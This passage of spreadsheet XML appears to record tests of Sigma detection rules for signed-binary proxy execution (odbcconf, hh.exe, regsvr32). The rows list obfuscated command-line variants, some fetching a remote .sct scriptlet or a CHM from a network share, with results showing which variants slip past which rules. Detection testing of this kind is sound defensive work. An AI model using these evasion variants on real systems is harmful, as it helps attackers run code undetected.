      <c r="G1876" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1876" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1876" s="43" t="n"/>
      <c r="J1876" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1876" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1877" ht="15.75" customHeight="1" s="42">
      <c r="A1877" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B1877" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C1877" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D1877" s="43" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E1877" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe  -f "T1218.008.rsp"</t>
        </is>
      </c>
      <c r="F1877" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1877" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1877" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1877" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J1877" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1877" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1878" ht="15.75" customHeight="1" s="42">
      <c r="A1878" s="36" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B1878" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C1878" s="36" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D1878" s="36" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E1878" s="36" t="inlineStr">
        <is>
          <t>odbcconf.exe "-f" "T1218.008.rsp"</t>
        </is>
      </c>
      <c r="F1878" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1878" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1878" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1878" s="43" t="n"/>
      <c r="J1878" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1878" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1879" ht="15.75" customHeight="1" s="42">
      <c r="A1879" s="36" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B1879" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C1879" s="36" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D1879" s="36" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E1879" s="36" t="inlineStr">
        <is>
          <t>odbcconf.exe -f "T1218.008.rs""p"</t>
        </is>
      </c>
      <c r="F1879" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1879" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1879" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1879" s="43" t="inlineStr">
        <is>
          <t>Suspicious Response File Execution Via Odbcconf.EXE (2d32dd6f-3196-4093-b9eb-1ad8ab088ca5)</t>
        </is>
      </c>
      <c r="J1879" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1879" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1880" ht="15.75" customHeight="1" s="42">
      <c r="A1880" s="36" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1880" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1880" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1880" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1880" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F1880" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1880" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1880" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1880" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1880" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1880" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1881" ht="15.75" customHeight="1" s="42">
      <c r="A1881" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1881" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1881" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1881" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1881" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F1881" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1881" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1881" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1881" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1881" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1881" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1882" ht="15.75" customHeight="1" s="42">
      <c r="A1882" s="36" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1882" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1882" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1882" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1882" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F1882" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1882" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1882" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1882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882" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1882" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1883" ht="15.75" customHeight="1" s="42">
      <c r="A1883" s="36" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1883" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1883" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1883" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1883" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F1883" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1883" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1883" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1883" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1883" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1883" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1884" ht="15.75" customHeight="1" s="42">
      <c r="A1884" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1884" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1884" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1884" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1884" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F1884" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1884" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1884" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1884" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1884" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1884" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1885" ht="15.75" customHeight="1" s="42">
      <c r="A1885" s="36" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1885" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1885" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1885" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1885" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1885" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1885" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1885" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1885" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1885" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1885" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1886" ht="15.75" customHeight="1" s="42">
      <c r="A1886" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1886" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1886" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1886" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1886" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1886" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1886" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1886" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1886" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1886" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1886" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1887" ht="15.75" customHeight="1" s="42">
      <c r="A1887" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1887" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1887" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1887" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1887" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1887" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1887" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1887" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1887" s="43" t="n"/>
      <c r="J1887" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1887" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1888" ht="15.75" customHeight="1" s="42">
      <c r="A1888" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1888" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1888" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1888" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1888" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1888" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1888" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1888" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1888" s="43" t="n"/>
      <c r="J1888" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1888" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1889" ht="15.75" customHeight="1" s="42">
      <c r="A1889" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1889" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1889" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1889" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1889" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F1889" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1889" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1889" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1889" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1889" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1889" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1890" ht="15.75" customHeight="1" s="42">
      <c r="A1890" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1890" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1890" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1890" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1890" s="36" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F1890" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1890" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1890" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1890" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1890" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1890" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1891" ht="15.75" customHeight="1" s="42">
      <c r="A1891" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1891" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1891" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1891" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1891" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F1891" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1891" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1891" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1891" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1891" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1891" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1892" ht="15.75" customHeight="1" s="42">
      <c r="A1892" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1892" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1892" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1892" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1892" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F1892" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1892" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1892" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1892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892" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1892" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1893" ht="15.75" customHeight="1" s="42">
      <c r="A1893" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1893" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_flags_anomaly</t>
        </is>
      </c>
      <c r="C1893" s="36" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly</t>
        </is>
      </c>
      <c r="D1893" s="36" t="inlineStr">
        <is>
          <t>b236190c-1c61-41e9-84b3-3fe03f6d76b0</t>
        </is>
      </c>
      <c r="E1893" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s /u "/i:"C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct" scrobj.dll</t>
        </is>
      </c>
      <c r="F1893" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1893" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1893" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1893" s="36" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1893" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1893" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1894" ht="15.75" customHeight="1" s="42">
      <c r="A1894" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1894" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_flags_anomaly</t>
        </is>
      </c>
      <c r="C1894" s="36" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly</t>
        </is>
      </c>
      <c r="D1894" s="36" t="inlineStr">
        <is>
          <t>b236190c-1c61-41e9-84b3-3fe03f6d76b0</t>
        </is>
      </c>
      <c r="E1894" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s /u -n /i:"C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct" scrobj.dll</t>
        </is>
      </c>
      <c r="F1894" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1894" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1894" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1894" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Child Process Of Regsvr32 (6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1894" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1894" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1895" ht="15.75" customHeight="1" s="42">
      <c r="A1895" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1895" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_flags_anomaly</t>
        </is>
      </c>
      <c r="C1895" s="36" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly</t>
        </is>
      </c>
      <c r="D1895" s="36" t="inlineStr">
        <is>
          <t>b236190c-1c61-41e9-84b3-3fe03f6d76b0</t>
        </is>
      </c>
      <c r="E1895" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Windows\system32\regsvr32.exe /s /u /^i:"C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct" scrobj.dll</t>
        </is>
      </c>
      <c r="F1895" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1895" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1895" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1895" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Child Process Of Regsvr32 (6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca); Potential Regsvr32 Commandline Flag Anomaly (b236190c-1c61-41e9-84b3-3fe03f6d76b0); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1895" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1895" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1896" ht="15.75" customHeight="1" s="42">
      <c r="A1896" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1896" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_network_pattern</t>
        </is>
      </c>
      <c r="C1896" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP/FTP Pattern</t>
        </is>
      </c>
      <c r="D1896" s="36" t="inlineStr">
        <is>
          <t>867356ee-9352-41c9-a8f2-1be690d78216</t>
        </is>
      </c>
      <c r="E1896" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s /u "/i:h"ttp://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll</t>
        </is>
      </c>
      <c r="F1896" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1896" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1896" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1896" s="43" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1896" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1896" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1897" ht="15.75" customHeight="1" s="42">
      <c r="A1897" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1897" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_network_pattern</t>
        </is>
      </c>
      <c r="C1897" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP/FTP Pattern</t>
        </is>
      </c>
      <c r="D1897" s="36" t="inlineStr">
        <is>
          <t>867356ee-9352-41c9-a8f2-1be690d78216</t>
        </is>
      </c>
      <c r="E1897" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Windows\system32\regsvr32.exe /s /u /^i:h^ttp://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll</t>
        </is>
      </c>
      <c r="F1897" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1897" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1897" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1897" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Child Process Of Regsvr32 (6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca); 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1897" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1897" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1898" ht="15.75" customHeight="1" s="42">
      <c r="A1898" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1898" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_network_pattern</t>
        </is>
      </c>
      <c r="C1898" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP/FTP Pattern</t>
        </is>
      </c>
      <c r="D1898" s="36" t="inlineStr">
        <is>
          <t>867356ee-9352-41c9-a8f2-1be690d78216</t>
        </is>
      </c>
      <c r="E1898" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s /u -i:HTTP://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll</t>
        </is>
      </c>
      <c r="F1898" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1898" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1898" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1898" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Child Process Of Regsvr32 (6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca); 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1898" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1898" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1899" ht="15.75" customHeight="1" s="42">
      <c r="A1899" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1899" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_2</t>
        </is>
      </c>
      <c r="C1899" s="36" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location</t>
        </is>
      </c>
      <c r="D1899" s="36" t="inlineStr">
        <is>
          <t>327ff235-94eb-4f06-b9de-aaee571324be</t>
        </is>
      </c>
      <c r="E1899" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\syswow64\regsvr32.exe /s \\?\C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll</t>
        </is>
      </c>
      <c r="F1899" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1899" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1899" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1899" s="36" t="inlineStr">
        <is>
          <t>Suspicious Regsvr32 Execution From Remote Share (88a87a10-384b-4ad7-8871-2f9bf9259ce5); Potentially Suspicious Child Process Of Regsvr32 (6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1899" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1899" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1900" ht="15.75" customHeight="1" s="42">
      <c r="A1900" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1900" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_2</t>
        </is>
      </c>
      <c r="C1900" s="36" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location</t>
        </is>
      </c>
      <c r="D1900" s="36" t="inlineStr">
        <is>
          <t>327ff235-94eb-4f06-b9de-aaee571324be</t>
        </is>
      </c>
      <c r="E1900" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\syswow64\regsvr32.exe /s C:.\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll</t>
        </is>
      </c>
      <c r="F1900" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1900" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1900" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1900" s="36" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1900" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1900" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1901" ht="15.75" customHeight="1" s="42">
      <c r="A1901" s="36" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B1901" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_extensions</t>
        </is>
